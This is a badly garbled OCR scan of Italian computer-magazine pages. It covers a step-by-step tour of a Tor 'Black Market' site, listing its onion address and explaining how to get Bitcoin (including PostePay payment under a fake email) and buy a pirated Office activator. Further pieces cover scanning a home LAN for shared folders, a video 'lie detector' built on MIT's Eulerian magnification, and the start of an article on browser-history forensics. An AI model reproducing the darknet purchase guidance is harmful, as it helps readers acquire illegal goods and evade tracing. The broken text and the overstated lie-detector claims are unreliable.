le attività illecite sono a fini di lucro, nulla di 
piu lacile che imbattersi in esse accedendo ai 
vari market che si trovano listati sul portale. 
In italiano c’è ben poco, ma il Black Market è 
diventato famoso per gli utenti nazionali. Si 
accede duTORDIR e scrivendo il nome del sito 
nel campo di ricerca. L'indirizzo comunque è 


http:// 5omwsppiik7cwvk.onion.to/ index.php. 
f topo u na breve registrazione, necessaria per le 
transazioni, eccoci dentro a questusupermer- 
cato di mercedi vario tipo. Tutto è classificato 
per tipologia: non ci rimane che scegliere un 
prodotto. Operazione difficile, quando andiamo 
a vedere le diverse sezioni; su Black Market è 
possibile trovare droga, armi, servizi legati 
al sesso, 'lavanderie'’ pei i soldi, documenti 
falsi e software pirata. Una volta individuato il 
prodotto, si accede allasuaschedaconun clic 
per trova re una descrizione e il costo. TI prezzo 
è Indicato in Bitcoln, la moneta elettronica di 
Internet, di cui parleremo più avanti. 


Nella fabbrica dei Bitcoin 


4 



Creiamo un nostro portafoglio virtuale eWaliet e riempiamolo con i Bitcoin che avremo creato o ottenuti 
ri. Ma senza tt ” 


in regalo da altri 


fretta, perché sul Deep Web i tempi sono molto più dilatati che non nella realtà! 


x II portafoglio virtuale 


j». Sincronizziamo i dati 


Facciamoci un regalo 


La prima operazione da compiere è la cre¬ 
azione del portafoglio virtuale Vista la triste 
sorte di Myditcoin.com (un famoso eWailet on-linef 
scarichiamo il portafoglio invece di utilizzarne uno 
pronto all uso. Da http://bitcoln.ofg scarichiamo il 
Client e installiamolo sul computer 


■} All'avvio del programma il firewall ne bloc¬ 
cherà l'accesso alla Rete e chiederà l'auto¬ 
rizzazione per l'invio dei dati. Autorizziamo il traffico 
solo su reti private e attendiamone la sincronizza¬ 
zione. Terminata questa fase il borsellino virtuale è 
pronto e dobbiamo solo caricarlo 


? I: All'inizio, invece che investire denaro aneto 
rno alla ricerca di Bitcoin in regalo Scan 
chiamo Dragon’s Tale, un mondo virtuale tipo Secontì 
lite, in cui le statue regalano moneta del posto, ovve¬ 
ro una frazione dei Bitcoin Giocandoci sopra un 
messaggio ci chiederà di accettare il regalo. 



^ Trasferiam o i bitcoin 

4 Cicchiamo Search fora gift Un popup 

mostra l'entità del regalo, che in questo 
caso è di 2 BTM. Ogni BTM corrisponde a 0,001 
BTC Cucchiamo Yes per accettarlo. Per trasferire il 
denaro virtuale nel nostro eWailet torniamo sul dierrt 
Bitcoin e copiamo l'indirizzo per ricevere pagamenti. 



^ Prendiamoci il denaro 

Cucchiamo Ricevi monete. Apparirà un 
codice con un'etichetta modificabile. Sele¬ 
zioniamo col tasto destro del mouse e cicchiamo 
Copia indinzzo nel menu che appare. Torniamo sul 
nostro avatar in Dragon's tale e cicchiamoci sopra, 
scegliendo poi la voce Utility óa\ menu contestuale 



Ultimi passaggi 

Nel menu l/ff% cicchiamo Withdraw brt- 
coins Al posto dell'eventuale indirizzo indi¬ 
cato nel campo Seat io address incolliamo l'indiriz¬ 
zo copiato dal nostra portafogli virtuale (Passo 5i e 
indchiamo l’importo del regalo. Nel box dei messag¬ 
gi troveremo la conferma deli operazione. 
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IBITCOIN SI ACQUISTANO CON LA POSTEPAY 


É possibile acqu istare Bitcoin di¬ 
rettamente con la carta di credito 
prepagata più amata dal Web. la 
PostePay. Per farlo andiamo sul 
sito www.posteb.it. None richie¬ 
sta alcuna registrazione, ma solo 
l’indirizzo cui accreditare i Bitcoin 
acquistati. L'indirizzo e mail da 
fornire nel campo La vostra email 
pud essere anche fasullo, inse 
riamo il numero di Bitcoin che 
vogliamo comprare nel campo 
Quantità. Nel campo Indirizzo 
Bitcoin di destinazione inseria 
mo il nostro indirizzo nostro, che 
troviamo nell'eWallet Bitcoin. 
Copiamolo e incolliamolo. In 
questa fase bisogna fare molta 
attenzione, perché le transazioni 


in Bitcoin non sono rivedibili e 
una volta effettuate non si può 
tornare indietro. Confermando 
le operazioni, una nuova finestra 
fornisce le indicazioni per effet¬ 
tuare il pagamento, il pagamento 
avviene curiosamente attraverso 
una ricarica sulla PostePay di una 
persona di cui ci vengono forniti 


i dati, il codice fiscale e il numero 
della carta. Abbiamo dueore per 
provvedere alia ricarica, che deve 
essere dell'esatto importo richie¬ 
sto. Scadute le due ore, la transa¬ 
zione verrà annullata. Possiamo 
ricaricare in qualunque ufficio 
postale, tabaccheria, ricevitoria 
Sisal oppure on-line. 


fi posteBit 
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Acquisti sicuri? 

Non siamo certo su eBay, dove il venditi 
l'acquirente sono registrati e rintracciabili* 
siamo su un supermercato del Deep Web! Le 
fregature sono sempre dietro l'angolo sul Web, 
liguriamoci qui. E allora ecco che troviamo, 
anche in questi spazi, la sezione dei feedback, 
dove gli utenti che hanno acquistato lasciano 
commenti sulla bontà della merce, sull'anoni¬ 
mato del pacchetto, sull'assenza dell’odore di 
erba e sulla velocità dell’evasione dell’ordine. 
I feedback sotto importanti perché è pratica- 
mente l'un ico modo che abbiamo per decidere 
se fidarci di un venditore. Quando ne troviamo 
uno onesto (suona ridicolo detto qui}, possi a 
mo anche salvarlo tra i nostri preferiti, cosi da 
ritrovarlo velocemente all’accesso successivo. 

Le transazioni in Bitcoin 

I Bitcoin sono la immota elettronica di Inter¬ 
net. Acquistarli non è complicato, ma richiede 
alcune operazioni preliminari. Innanzitutto 
è bene verificare dove è possibile acquistare 
risparmiando. Ci sono infatti differenti costi 
per ogni Bitcoin. Dopo aver tatto q uesta ricerca 
ed aver individuato il sito che fa al caso nostro, 
dobbiamo creare un portafoglio virtuale in cui 
depositare le monete acquistate e in cui farci 
accreditare i Bitcoin derivanti da transazioni 
in cui noi siamo i venditori. I portafogli vir¬ 
tuali vengono offerti da diversi siti, ma anche 
in questo caso conviene, anzi è fondamentale, 
studiare prima le differenti offerte perché è vero 
che tali spazi vengono offerti gratuitamente, 
ma èaltrettanto vero che la moneta elettronica 
è cibo ghiotto per gli hacker che infatti han¬ 
no “rapinato” diversi siti che offrono questo 
servizio, facendo sparire una considerevole 


mole di moneta virtuale che, proprio per le sue 
arattetàstiche, non è rintracciabile. Un caso 
emblematico è quello di Mybitcoin.com. \ (ita 
volta che abbiamoti portafoglio virtuale, che ci 
dà in s pti/io in cui accumulare moneta virtuale, 
un é-mail die è il nostro Indirizzo di deposito e 
che altro non è che tuia chiave alfanumerica e 
la chiave per gliacciedki,pussiaiiioprocurarci 
i Bitcoin. TI verbo procurare I d'obbligo, perché 
i Bitcoin possono essere acquistati, ora anche 
con PostePay, ma possonoessere ancneiCSttti 
in regalo su alcuni siti come ad esempio a leoni fri 
mondi virtuali, tipo http://Dragons.tl, in cui 
alcuni personaggi regalano Bitcoin. h infine, 
possono essere persino creati: in quest'ultimo 
caso, se decidessimo di diventare Bitcoin Miner, 
avremmo come contropartita le transazioni 
gratuite e un piccolo guadagno. Per produrre 
Bitcoin non serve trasformarsi in poligrafico, 
ma basta usare l’energia elettrica e la CPU del 


computer, e si produce 1 Bitcoin ogni 10 minuti 
circa. Per fare acquisti su Black Market, ma in 
generale sul Deep Web (e da un po' dì tempo 
anche su alcuni siti "in chiaro "), è necessario 
aprire un deposito in Bitcoin. Le transazioni 
sono meno costose di quelle che transitano 
attraverso un istituto di credito perché i B1C 
vengono prodot li d inettamente e direttamente 
spostati da persona a persona. Inoltre non è 
facile rintracciameli percorso. Su Black Market, 
in alto a destra, troviamo la chiave per effettuare 
un deposito e possiamo tenere sotto controllo 
il nostro conto virtuale. Una volta effettuata la 
transazione uonriinane che aspettare e sperare 
di non aver avuto una fregatura. 

Che fare, che dire? 

In conclusione abbiamo fatto una carrellata 
di questo mondo sconosciuto. La difficoltà di 
rintracciare le transazioni e i siti che dimora¬ 
no su questa parte del Web rendono il lavoro 
delle forze dell’ordine difficile. Impossibile 
risalire ai compratori, impossibile risalire ai 
venditor i, per ogni transazione vera effettuata 
nc vengono create a migliaia fasulle rendendo 
inutile qualsiasi Tentativo di tracciamento. 11 
gruppo di hacker che si sono riuniti sotto il 
itomedi Anonymouscompie periodici attacchi 
ai siti pedo pornografici. Ma anche qui ètutto 
inutile, basta fare il backup del sito su un altro 
server e si è nuovamente on-line. C'è ancora 
molto da dire su questo mondo che ha le sue 
regole e la sua moneta di scambio. Come si 
luce quest ultima/ Una moneta elettronica 
ozio na ria che potrebbe portare ad enormi 
enti e che per questo non è ben vista 
dai go%rni centrali. Qualèla posizione assun¬ 
ta dalla società civile nei confronti di questo 
mondo sommerso? Quali misure sono state 
adottate sin ora dalle nostre forze dell'ordine 
per fermare alcuni fenomeni che dimorano sul 
Deep Web? É probabile che torneremo presto 
sull’argoinento. 
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Black Market Reloaded è uno dei principali punti di partenza per gli acquisti sul Deep Web. 
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Acquisti nel Deep Web 

Finché si tratta di navigare nella Rete sommersa non si compie alcun reato. Il rischio di violare la legge, invece, 
si corre effettuando un acquisto. Quello che fanno i pirati ordinando, ad esempio, un keygen! 
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a La scelta è molto ampia 

Per la nostra prova di acquisto andiamo sul 
Black Market, secondo le Indicazioni date in 
precedenza e sfogliamo il catalogo cercando tra le 
diverse categorie qualcosa da acquisto Alla fine, 
optiamo per la categoria Software do « cucchiaini; 
su PC e nuovamente su Software 



a Proviamo con un seriale 

2 Clicchiamo Microsoft Office 2007/2010/ 
2013 Activator La pagina dedicata tornisce 
la spiegazione di dò che andiamo a comprare; un tool 
di attivazione di qualunque versione di Office. Basta 
avviarlo una volta ricevuto e permette anche di fare gli 
aggiornamenti. Costo 0,00002 BTC 


a Spostiamo il denaro 

4 ' Clicchiamo Invia monete, incolliamo l'indiriz 
* zo m Paga a e scegliamo un’etichetta per la 
-ansazrone in modo che ne rimanga traccia. Inseriamo 
-porto da trasferire, assicurandoci che la valuta sia il 
BTCe cicchiamo Spedisci I Bitcoin vengono caricati 
ai nostro account. 


a Un account per ordinare 

-j Per procedere con l’acquisto carichiamo il 
nostro conto on-line su Black Market Sulla 
pagina del sito in alto a destra troviamo l’indirizzo 
cui l’account e collegato tvidenziamolo e copiamolo. 
Torniamo al portafoglio virtuale e spostiamo i Bitcoin 
direttamente al Black Market 
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a C’è anche una commissione 


g ; Ci viene chiesto di includere una commissio 
ne, che servirà a retnbuire i miner, ossia gli 
utenti che mettono a disposizione le proprie nsorse in 
termini di energia elettrica e CPU per la produzione dei 
Bitcoin. Solitamente la commissione è di 0,005% e va 
impostata di volta in volta. 



Impostiamo la commissione 

Cucchiamo sul menu Impostaziom/Opzioni 
In Generale troviamo il campo in cui modifi¬ 
care la commissione, che di default è zero. Inseriamo 
la percentuale e cicchiamo Appty. Modifichiamo firn 
porto dei pagamento, considerando anche tale com¬ 
missione e diamo l O/Caila transazione. 



a Paghiamo il venditore 

7 : Caricalo 'account possiamo procedere all'acquisto Prettamente da Black 
Market Ma dove troviamo l’indirizzo del venditore? Ciccando informazio¬ 
ni sul venditore troviamo la chiave pubblica che, come spiegato nel articolo, serve 
per individuare la destinazione della moneta virtuale 



a Come arriva la merce? 

g Sulle informazioni del prodotto, verifichiamo come e dove fario arrivare a 
destinazione. Nef nostro caso, avendo acquistato una chiave per sbloccare 
e validare un software, il venditore ce la invierà su un account di posta Tot, indican¬ 
doci di solito anche un suo indirizzo preferito. 






































































































Scopri se ci sono intrusi nella tua rete locale utilizzando 

gli strumenti software preferiti dai pirati informatici 


Alla ricerca delle 

cartelle condivise 



Iniziamo la sca nsione 

a Selezioniamo la scheda di rete installata nel nostra computer, 
cicchiamo OKe poi Start scanning^ iniziare lo spionaggio. 
Dopo qualche secondo inizieranno ad apparire le informazio¬ 
ni relative agli altri computer connessi alla LAN. Se vengono trovati 
elementi condivisi, apparirà un'icona a forma di +. 


non lasciare porte aperte ai malin¬ 
tenzionati. Per essere certi di avere 
approntato una corretta linea di di¬ 
fesa, è opporti) no i mparare ad agire 
come un vero hacker e “attaccare" 
i nostri PC. Vediamo come farlo in 
pochi passi. 


Q uantio si condivide una risorsa 
sul proprio computer, sia essa 
una cartella o una stampante, 
bisogna sapere che è molto semplice 
scoprirne da remoto l’esistenza. Ciò 
significa che ad un pirata basta poco 


a disposizione sul nostro PC. Per 
questo morivo è necessario attivare 
sempre le opportune difese, come 
il firewall e le protezioni in lettura 
e scrittura delle cartelle ed evitare 
il più possibile di attivare directory 
!, in modo da 


per individuare i contenuti messi condivise non protette 
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Troviamo gli indirizzi della LAN 

a Pe^ testare la sicurezza delia rete usiamo Sof tPerfed Network 
.; Scanner basta un doppio clic sul file netscan exe per awiar- 
: lo (non serve installarlo). Per eseguire una scansione della 
LAN inseriamo ir Range From e To gli IP della rete. Se non li cono¬ 
sciamo cicchiamo Auto Detect IP Range 



Le riso r se condivise 

a Per conoscere ie risorse remote e accedere al loro contenuto, 
cicchiamo sull'icona + e poi, col tasto destro del mouse, su 
una di esse. Dal menu contestuale che appare scegliamo se 
esplorarne il suo contenuto (selezionando Explore) o accedervi come 
se fosse un disco di rete iMap network Drive). 


PRIVACY: PROTifttiU COSÌ 

Teniamo sempre attivo il firewall: avremo così la possibilità 
di bloccare ogni accesso non autorizzato al nostro PC. 

Se usiamo il firewall di Windows Vista?, digitiamo firmai! 
nel menu Starle cicchiamo Windows Firewall con protezione 
avanzata. Selezioniamo Regole di proiezione delle connessioni e 
poi Nuova regola. Scegliamo di bloccare le connessioni in base 
al dominio (il range di indirizzi IP della nostra LAN, vedi Passo 1) 
o altre regole. 

Creiamo cartelle condivise protette da password Se 
abbiamo Windows Vista/7, da Start/Pannello di controlio 
cicchiamo Centro connessioni di rete e condivisione. 
Spostiamoci il Conóivisione e individuazione e attiviamo la 
Contìivisione protetta da password. Solo chi ha un account sul 
computer potrà accedere alle risorse condivise. 




Tempo 

20 minuti 



Difficoltà 

Mcdu 


Cosa ci 
occorre 

SNIFFER DI RETI 

SOFTPERFECT 
NETWORK 
SCANNER 5.1.1 

Lo trovi su *'CD 

Gratuito 

Sito internet: 

vmu sottpertect.com 



CI SPIANO 
SU INTERNET 

L'analisi effettuata nei 
tutoria) riferiste solo 
ai PC connessi alla LAN 
dj casa. Ovviamente, e 
possibile estendere il 
tentativo di ricerca delle 
cartelle condivise effet 
tuando una scansione 
da “fuori", allegandosi 
cioè a Internet con un al¬ 
tro sistema (ad esempio 
usando un portatile e 
una chiavetta Internet) 
per'analizzarcr come 
farebbe un vero hacker. 
La procedura è simile 
a quella del tutorial: 
basterà individuare IIP 
assegnato al router ADSL 
e dirigere la scansione 
solo verso di lui. Sicura¬ 
mente le porte aperte e 
i computer individuati 
saranno di me no rispet 
to all’analisi effettuata 
nella LAN, visto che il 
router offre un uttenore 
livello di protezione, ma 
prima di avete la certez¬ 
za (o almeno maggior 
sicurezza) che nessuno 
abbia accessoai nostri 
dati, e bene svolgere an¬ 
che questa scansione. 
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Serie WorkForce Pro 


La sene WorkForce Pro è progettata per il tuo business. Questa 
gamma di stampanti e multifunzione inkjet offre un risparmio sui 
costi per pagina fino al 50%, stampa più velocemente i documenti di 
poche pagine e consuma fino all'80% in meno rispetto alle stampanti 
laser a colon più vendute*. Con la stampa fronte/retro automatica 
ad altissima velocita, le tamche facili da sostituire senza lasciare 
residui di inchiostro, la grande convenienza e la semplicità di utilizzo, la 
gamma WorkForce Pro è la scelta giusta per rinnovare le stampanti 


laser del tuo ufficio. 


»»> 


50% 


80% 


Più veloci 


Risparmio sui costi per pagina fino al 50% 


Consumi energetici inferiori fino all’80% 


Per maggiori informazioni, visita il sito www.epson.it/workforcepro 
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Investigatore informatico 


La macchina delia verità 



La macchina 
flella verità 

La guida pratica e i software 
per trasformare il PC in uno 007 
digitale “smaschera bugiardi” 


Cosa ci 
occorre 


TOOL DI ANALISI VÌDEO 

EULERIAN VIDEO 
MAGNI FICATION 

uuani‘-' Gratuito 
Si» 'nteniei: 

www.winmagazine. 

rt/link/2155 


SOFTWARE DI 

<MÉo editing 

ADOBE 

PREMIERE PRO 

ictnW-.Mcm ^ 



ALL MEDIA 
CONVERTER 

Lo trovi su ftSCD 

Gratuito 

Sito lllWTÌtft 

www.danusoft.coin 


S ei proprio sicuro che le cose stiano 
davvero come ti fanno credere? Puoi 
veramente fidarti del le persone che hai 
intorno? E se fosse tutto un enorme complot 
to? Qu i bisogna correte ai ripari e studiare il 
nostro "nemico' usando tutte le tecnologie 
che abbiamo a disposizione, come ad esem¬ 
pio la "video macchina della verità”! Non si 
trattadi una genialata di nostro amia) burlo 
ne. 11 progetto è stato sviluppato nientemeno 
che dai ricercatori del Computer Science and 
Arrificial Intelligence Laboratory (CSAIL) 
del Massachusetts Institute of Technology 
(MIT). Eulerian Video Magnificarion, questo 
ii,*!onie del progetto, è interamente basato 
jfàoftware di calcoLu numerico Matlab 
ww , .wfnmagazine.it/ l link/2156) e sfrutta 
una nuova tecnologia di analisi video che 
permette di cogliere anche la più piccola 
variazione nella colorazione della pelle e 
il minimo movimento dei muscoli facciali. 

Attendo a quel che dici 

I mentitori di professione ora hanno le 
ore contate! Eulerian, infatti, è in grado di 
cogliere ogni loro più piccola incertezza 
nell’espressione del volto! Ma non finisce 
qui! I ricercatori del MIT hanno deciso di 
condividere con gli utenti del Web questo 
progetto, consentendo a chiunque di cari 
care un video di trenta secondi che verrà poi 
scansionato dall'Eulerian Video Magnifica- 
tion alia ricerca della più piccola incertez¬ 
za nell’espressione dell'Interlocutore. Ma 
funzionerà veramente? Abbiamo deciso di 
mettere Eulerian alla prova caricando sul 
sitodelMIT un primopianodi trentasecondi 
con un'attrice che guarda fissa in camera. 
Dopo aver scansionato il volto con Eulerian 
abbiamo scaricato il video risultato usando 
un plug-in per browser in grado di effettuare 
il download di qualunque formato dal Web. 









La macchina della verità 


Investigatore informatico^ 


EULERIAN VIDEO MAGNIFICATION: ECCO COME FUNZIONA 


Sviluppato dalla MathWorks. MatLab 
è un programma che fornisce un am¬ 
biente per il calcolo scientifico e la vi¬ 
sualizzazione grafica dei dati, tanto da 
essere diventato i I prog ramma di punta 
in ambito didattico e applicativo |»wiw. 
mathworks.lt/products/matlab). Al cen¬ 
tro della schermata principale è presen¬ 
te la finestra Command Window nella 
quale, impartendo il comando help, si 
ha accesso a tutta la documentazione 
dei pacchetti softwarededlcati a speci 
fiche applicazioni. I n questo ambiente, 
oltrealle svariate operazioni di'uso im¬ 
mediato" come funzioni matematiche, 
matrici numericheecc, nei diversi ambiti 
(dall'Ingegneria all'Economia) è possi 
bile operare anche con un linguaggio 
di programmazione semplice da usare. 
Sfruttando questo l inguaggio si pos¬ 
sono creare i cosiddetti M files che si | 
dividono in script, funzioni e classi: daf 


menu File, ciccando New è possibile 
scegliere uno di questi tre tipi affinché 
l edi tor/debugger interno adotti il tem¬ 
piale predefinito che ne facilita la scrit¬ 
tura. Per eseguire un M-file è sufficiente 
entrare nella directory di salvataggio 
utilizzando il pannello (o la riga) C urrent 
Directory e digitare nella Command 
Window solo il nome del file, senza 
estensione È anche possibile operare 
con progetti complessi composti da de 
ci ne o centina la di M-file: in questi casi, 
sarà generalmente presente un file con 
nome make.m che permette di'com¬ 
pila re" l'intero progetto, rendendolo 
eseguibile. È questo il caso del progetto 
Eulerian Video Magnification realizzato 
dal MIT (trovi il codice sorgente nella 
sezione lo trovi sul Win CD-Rom del 
WinCD/DVD-Roml: scompattando l'ar- 
chlvioifVfH Mathb- J. ljìp accediamo 
tra gli altrijnche al file make.m Una 


volta eseguito, verranno caricati anche 
tutti gli altri file. Questi ultimi sono un 
insieme di comandi che, a pplicati al file 
video caricato in MatLab, applicheran¬ 
no gli effetti grafici che permettono 
di analizzarne i singoli fotogrammi 
In questo modo, come spiegheremo 
neH'articolo, sarà possibile individuare 
variazioni anche minime del colorito 


di una persona o movimenti muscolari 
impercettibili. Ecco quindi che, grazie 
alla potenza di MatLab, semplici righe 
di codice possono trasformarsi in una 
efficiente macchina della verità. MatLab 
può essere acquistato sul sito della Ma¬ 
thWorks, anche come Student Version 
(www.mathworks.it/store/product 
IndexLinlcdo), 
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L'interfaccia di MatLab è apparentemente semplice, ma per usarla meglio 
occorrono conoscenze avanzate di programmazione e calcolo numerico. 


Infine abbiamo realizzato un video confron¬ 
to tra la clip originale e quella trattata con 
Eulerian, utilizzando Premiere CS6. 

Non si tratta di soli video 

Affinché una macchina della verità sia 
davvero efficiente, però, non può limitar¬ 



si soltanto ali analisi dei video. Abbiamo 
quindi realizzato un kit di strumenti con 
cui potremo analizzare anche lavocenelle 
nostre videochai ed elaborare le imma¬ 
gini digitali per scoprite se sono stàte in 
qualche modo ritoccate o “carrette” per tar 
sembrare vere situazioni altri memi irrea¬ 


lizzabili! E perfinire, ecco anche la versione 
portatile del nostro kit, funzionante anche 
sullo smartphone. Insomma, se è vero che 
le bugie hanno le gambe corte, grazie alla 
nostra potente macchina della verità vir 
tuale ora anche i furbetti verranno presto 
Smascherati! 



Facciamo partire le indagini 

La prima cosa da fare è filmare il soggetto di cui vogliamo studiare l’attendibilità. Al termine, carichiamo il video 
sul sito del MIT e prepariamoci a scagionarne ogni singolo fotogramma! 
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^ Sempre in prim o piano 

“I | Pe r capire se il nostro ìnteriocutere d sta nascondendo qualcosa, faccia 
mm* molo sedere davanti ala videocamera qund riprendanolo per 30 secon¬ 
di chiedendogli di rimanere il più poGsUe m notule davanti afi'obiettivo. In questo 
modo Eulenan sarà In grado di cogkere ogni ou pccoia incertezza del soggetto. 


* Carichiamo il video 

2 ; Colleghiamoci a www.Mnmagazine itdink/2157 e spostiamoci a fondo 
- " pagàia Spuntiamo /agree to ttie Terms of Service cicchiamo Sfoglia e 
selezioniamo il video reaSz/ato (nel Iormalo AVI H264, MOV, MP4, eoe) e che ran¬ 
cheremo sui server del MIT. Premiamo Apri e attendiamo II termine deHoperaaane 
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1 Investigatore informatico 


La macchina della verità | 


01 Scansioniamo le riprese 

È arrivato il momento di dare il video in pasto a Eulerian Video Maanification e scansionare ogni singolo 
fotogramma della clip alla ricerca della verità. Infine esporteremo la clip usando un plug-in per browser. 




Quarto Rvwjrch 
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^ Ma gnifichiamo il video ! 

■| LI liti vòlta terminato il cancamfft<^ff\ 

«—r lo vedremo compatire nella sezione | 
pale di Eulerian Video Magnification sotto l'area i 
Upload. con i indicazione My videos. A questo pun¬ 
to non ci resta che premere il pulsante Magnify per 
spostarci nella pagina di scansione video. 


La configurazione giusta 

Nella nuova finestra impostiamo Set fre- 
quency range (Hz) con un valore di 1,5. Tale 
irrisponde alla frequenza del battito cardia 
co amano, impostiamo Set Amplification a 40 per 
coglierexgni più piccola variazione nel soggetto 
Infine spuntiamo la voce Show atìddmai Óptions. 


1 Show addi 


Pronti a esportare 

^ ; In Adùitional Options impostiamo Set chro- 
mmance scaling 1, spuntiamo I agree to 
thè Terms of Service e premiamo Gol Terminata 
la scansione cucchiamo OK e mettiamo in Play il 
Magnified Video esultato Scarichiamo la clip usando 
uno dei piug-in per browser descritti nel sottostante. 



Convertiamo il video 


SCARICHIAMO 
IL VIDEO 

Per scaricare su P< il vi¬ 
deo realizzato con Eule 
rian useremo un plug-in 
per browser. Su Firefox 
ce Vìdeo Dvwlood 
He/per. Cerchiamelo da f 
Strumenti/Componenti 
aggiuntivi: una volta 
installato, avviamo la 
clip e premiamo il trian¬ 
golo a lato dell’icona di 
Download Helper appe¬ 
na comincia a muoversi. 
PerChromecèfDV 
Video Downìoader ri¬ 
cercabile da Strumenti/ 
(stensioni/Proea altre 
estensioni. Basta pre¬ 
mere la freccia blu per 
scaricare il video. Peri 
fedelissimi di Internet 
Explorer c'è lEDown- 
loa<Uielper{t\ttpJhe- 
downloadhelper.com), 
che funziona allo stesso 
modo degli altri. 


li sito del MIT usa il formato video Webm, motto diffuso in Rete ma incompatibile con Premiere. 
Per ovviare al problema convertiamo il video in formato MP4 utilizzando All Media Converter! 



^ Installiamo All Media Con verter 

| Dalla sezione Audio&Video del Win CD-Rom scarichiamo e 
installiamo il file ConvertAIISetup.exe Al termine avviamo I 
programma impostiamo con i pulsanti Browse l’Input Video sce¬ 
gliendo Webm dai menu a tendina e la Output Directory (la cartella 
in cui salvare il file convertito). 


^ Pronti a convertire! 

2 Impostiamo Mpeg4 come Codec ed mp4 come Extension. 
r Nel campo Resolution selezioniamo 1280x1024 e modifi¬ 
chiamo a mano il valore impostando 1280x720 (nel caso in cui il 
video di partenza sia in HO) oppure 1920x1080 se abbiamo un fil 
mato Full HO. Infine clicchiamo sul pulsante Convert. 
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La macchina delia verità j 


Investigatore informatico fp 


13 Interrogatorio doppio! 

Scaricata la clip scagionata da Eulerian, importiamola in Premiere CS6 insieme alla clip 
originale. Creiamo un video confronto dividendo lo schermo e osserviamo il “prima e dopo”! 




▲ Un nuovo progetto 

■J Avviamo Adobe Premiere CS6 e dalla schermata di Benve¬ 
nuto scegliamo la cartella in cui archiviare il nostro progetto, 
tiamogli un nome e confermiamo le moditjclie premendo il pulsante 
OK Nella nuova finestra ignoriamo la scafedeljormato di importa¬ 
zione e premiamo nuovamente OK. * É A 


Facciamo un po’ di spazio 

2 | Cucchiamo sulla traccia appena importata nella limeline, 
quindi posizioniamoci sull'etichetta Controllo Effetti ed espan¬ 
diamo la voce Movimento/Scala Togliamo anche il segno di spunta 
dalla casella di controllo Scala uniforme, quindi impostiamo un valore 
Larghezza scala al 50%. 


* Importiamo le clip 

2 Cucchiamo due volte nell'area Progetto. Importiamo la clip 
« f originale e quella scansicnata da Eulerian Video Magnification 
e convertita nei passi precedenti Trasciniamo in timeline quest’ulti- 
ma clip disponendola sulla traccia Video 1 e scegliamo Modifica le 
impostazioni della Sequenza 



^ Rimanendo al’interno della sezione Coninolo Effetti, clicchia 

■ mo sulla voce Movimenf&'Posizione per espandere il menu 
contestuale e modifichiamo i valori sull asse Xlsonc i vaicri nportati 
a sinistra) in modo da posizionare la clip nella parte destra all interno 
della finestra Monitor 



* Come un'intervista doppia 

g A questo punto possiamo importare anche la clip originale in 
w timeline: ridimensioniamola e riposizioniamo il filmato come 
già visto nei due passi precedenti. Infine dalla barra de» menu do Pre¬ 
miere in alto cicchiamo File/Espotta/File multimediali ed esportiamo 
il nostro video doppio. 



RISULTATO FINALE L'analisi del video magnificato evidenzia anche le 
più piccole variazioni fisiche del nostro intervistato, come ad esempio 
un impercettibile battito delle ciglia. Per esaminare con attenzione il 
lavoro eseguito da Eulerian Video Magnihcation possiamo scaricare da 
Win Extra il video d'esempio usato nel tutorial. 



IMPOSTAZIONI 
DI ESPORTAZIONE 


Dalla finestra Imposto- 
tieni iti esportami!* di 
Premiere C S6 possiamo 
impostare in assoluta 


libertà i formati di 
esportazione audio e 
video. Poniamo tuttavia 
la massima attenzione 
al formato video! Sce¬ 
gliere quello sbagliato 
può infatti compromet¬ 
tere il risultato finale. 
Ad esempio, se il nostro 
filmato è in HD (quindi 
1280x720) e decidiamo 


di esportare in AVI, 
avremo un filmato a 
720x400 pixel, quindi 
decisamente troppo 
"tagliato ’. Per non 
perderci tra i formati di 
esportazione, teniamo 
sempre d'occhio la voce 
Riepilogo. 

ESPORTIAMO 
SU DVD 

Con Premiere CS6 è 
possibile esportare le 
nostre clip e creare un 
DVD sfruttando il pro¬ 
gramma integrato Ado 
be Encore DVD. Un volta 
completato il mon¬ 
taggio della sequenza 
video è sufficiente 
selezionare, dalla batta 
dei memi, Flle/Adebe 
dynanw link/lnvia a 
encore. Il progetto ve» 
ra esportato su Adobe 
Encore e sarà possibile 
creare un DVDounBlu- 
ray con tanto di menu 
personalizzato. 


VISTA MINIATURE 

Nell'area Progetto 
esiste una interessante 
funzione, denominata 
Vista miniature che con 
sente non solo di muo¬ 
versi piu agevolmente 
tra le dip importate. ma 
anche di vederne uà an¬ 
teprima semplicemente 
scorrendo il marne 
sopra la immatura. 
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Scovato un tool che, come una 
microspia installata nel PC, rivela 
password, foto e video privati 


Cosa 
occorre 


ci 


Mmir 


SOFTWARE DI DICI rat 
FQREN9CS 

HISTORY 

VIEWER 

I c tt'Vi su ! ►'CD 

Sito intanai: 

www.histDryviewetnet 

^SNIFFER DI RETE 

VLADESCU 

| ►xn . 


•Sito irrorim m 

www.rostudeiitcuir/ 

roncrt/VlAl)Rscij.mml 

< 

SNIFFBR DI PETE 
LOCALE 

HTTP WflTCH 

Li'trov sii ✓CD 

MhtìUimMtvà 

Sii» internet- 

www.httpwatch.con 


S pesso si tende a considerare il compu¬ 
ter, specialmente quando si naviga nella 
tranquillila di casa, come capace di pre¬ 
servare al massimo la nostra privacy: in realtà, 
esrrarre informazioni e dati sensibili, relativi 
proprio alla navigazione Internet, è molto più 
semplice di quanto si possa pensare. Scoprire 
cosa stia facendo o abbia fatto un internauta 
durante l’uso della Rete è un lavoro che, con 
gli appositi programmi, richiede ad un hacker 
ben poco tempo. Imparare però a conoscere le 
tecniche per accedere a questi dati non ò soloun 
compito da pirata informatico, ina può essere 
utile a tutti proprio per capire come difendersi. 

Come segugi sul Web 

La caccia ai nostri dati di navigazione avverrà 
in due modalità. La prima è delta “Off-line'’e 
consistenell'analizzare determinate tracceche 
vengono lasciate da tutti i browser internet. 
Questa procedura permette di consultare i 
dati anche a distanza di tempo dal niotnen 
to in cui si è svolta la navigazione, ma come 
contropartita richiede che si possa accedere 
al disco del PC, cosa sicuramente possibile 
in un ambiente condiviso, come ad esempio 
la LAN di casa. La seconda modalità si basa 
invece su un’analisi in tempo reale dei traffico 
di rete usando un computer diverso da quello 
che si vuole controllare. Iale tecnica è detta 
di sniffing, cioè d'intercettazione dei dati che 
passano sulla rete e che possono essere memo 
rizzati sul computer della spia. Sicuramente 
più complessa ma anche più insidiosa, visto 
che può essere svolta da remoto. Non ci rima¬ 
ne quindi che passare all’atto pratico: prima, 
però, è bene ricordare che non è assolutamente 
lecito intercetta re il traffico altrui o anal izza re 
computer senza le autorizzazioni del legittimo 
proprietario. Pertanto l’unico nostro obiettivo 
è quel lo d i scoprire le criticità del la propria rete 
per metterla in sicurezza. 


























Accedere alla cronologia Web 

